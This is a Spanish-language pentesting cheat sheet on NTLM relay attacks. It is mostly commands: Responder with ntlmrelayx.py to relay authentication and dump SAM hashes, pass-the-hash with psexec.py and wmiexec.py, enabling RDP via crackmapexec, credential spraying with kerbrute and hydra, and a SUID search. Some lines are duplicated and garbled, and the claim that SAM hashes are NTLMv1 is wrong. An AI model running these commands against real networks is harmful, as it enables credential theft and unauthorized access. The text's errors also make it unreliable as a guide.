NTLM Relay
Más o menos como el SMB Relay pero ha diferencia de:
En el archivo responder.conf hemos de poner a OFF HTTP y SMB ya que estos servicios
los simularan el archivo ntlmrelayx.py.
En una primera ventana, correremos el comando:
Más o menos como el SMB Relay pero ha diferencia de:
En el archivo responder.conf hemos de poner a OFF HTTP y SMB ya que estos servicios
los simularan el archivo ntlmrelayx.py.
En una primera ventana, correremos el comando:
respondr -I eth0 -dw
En una segunda el comando:
python3 "ruta donde esté ntlmrelayx.py" -tf target.txt -smb2support
*La ruta de ntlmrelayx.py la encontramos haciendo un locate ntlmrelayx.py
*Y target.txt sera un archivo donde hayamos añadido las IP de las maquinas clientes, de
las que queremos dumpear la SAM. Ya sea haciendo un crackmapexec smb IP/24 para
ver las IP que sean clientes.
Cuado dumpeemos la SAM, esos hashes son NTLMv1 por lo que no hace falta
crackearlos, ya podemos usarlos directamente con el comando:
python3 "ruta donde esté psexec.py" Usuario
assWord@IP (puedes poner al final cmd.exe)
nombre.dominio no se pondría en este comando ya que es la SAM
Tambien podemos hacer pass the hash con wmiexec.py:
Tambien podemos hacer pass the hash con wmiexec.py:
python3 "ruta donde este wmiexec.py" nombre.dominio/Usuario@IP -hashes 1uydtXXXX8d:123XXXX712g
*Comodin
crackmapexec smb IP/24 -u User -p Password -M rdp -o action=enable
Esto para habilitar el rdp en los equipos con los que tengas privilegios con ese usuario y
esa contraseña y poder acceder a ellos.
*Comodin
nmap -p(puerto http) --script=http-enum -sV IP
*Comodin
crackmapexec protocolo IP -u file_users -p file_passwords
*Comodin
kerbrute -users users.txt -passwords pass.txt -domain dominio -threads 100
*Comodin
hydra -l user -P /usr/shares/wordlists/rockyou.txt ftp://IP -t 64
*Comodin
find / -perm -u=s -type f 2>/dev/null
LOS COMODINES SON COMANOS PARA QUE LOS INVESTIGUEIS POR VUESTRA CUENTA